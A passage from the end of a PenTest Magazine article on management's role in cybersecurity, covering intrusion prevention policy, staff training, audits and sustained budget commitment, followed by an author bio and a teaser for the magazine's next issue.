a proper intrusion prevention policy must be enforced<br />
for all critical systems by the senior management.<br />
Secondly, all concerned employees must be properly<br />
trained to handle and report suspicious activities on their<br />
computer systems. Periodic audits must be conducted<br />
to ensure employees are following all policies and<br />
processes.<br />
Sustained commitment<br />
Cyber security is like insurance and costs money<br />
constantly. It is not enough to show interest and invest<br />
some money on a one-off basis. One of the primary<br />
roadblocks for cyber security will be lack of sustained<br />
top management commitment. For example, the top<br />
management may approve the establishment of a<br />
good cyber security system at a time when they are<br />
particularly influenced by business and competitive<br />
pressures. But later they may not be willing to invest<br />
the necessary ongoing budgets and manpower to<br />
keep the system fully operational at all times. This can<br />
result in their systems becoming outdated and become<br />
vulnerable to attacks. So continuous commitment and<br />
expenditure are required to establish the latest proper<br />
cyber security standards.<br />
In spite of all the precautions it is still possible to<br />
get hacked. Nevertheless, with the above kinds of<br />
involvement by business managers your organization<br />
can be assured of a highly secure cyber security<br />
system that can handle almost all types of hackings.<br />
Finally, we can end this article with a quote by David<br />
Brower who says – All technology should be assumed<br />
guilty until proven innocent.<br />
THEJENDRA<br />
Thejendra is an IT manager from India. He is also the author<br />
of Practical IT Service Management, Disaster Recovery &<br />
Business Continuity, God is No Angel, etc. Visit his web cave –<br />
www.thejendra.com for more details.<br />
Page 43 http://pentestmag.com
In the next issue of<br />
Mobile<br />
Pentesting<br />
Available to download<br />
on January 8 th<br />
Soon in Pentest!<br />
• Shawn Valle<br />
• Daniel O‘Donor<br />
• Mouad Zahrane<br />
• Colin Schwingen<br />
If you would like to contact PenTest team, just send an email to<br />
maciej.kozuszek@software.com.pl or<br />
ewa.dudzic@software.com.pl . We will reply a.s.a.p.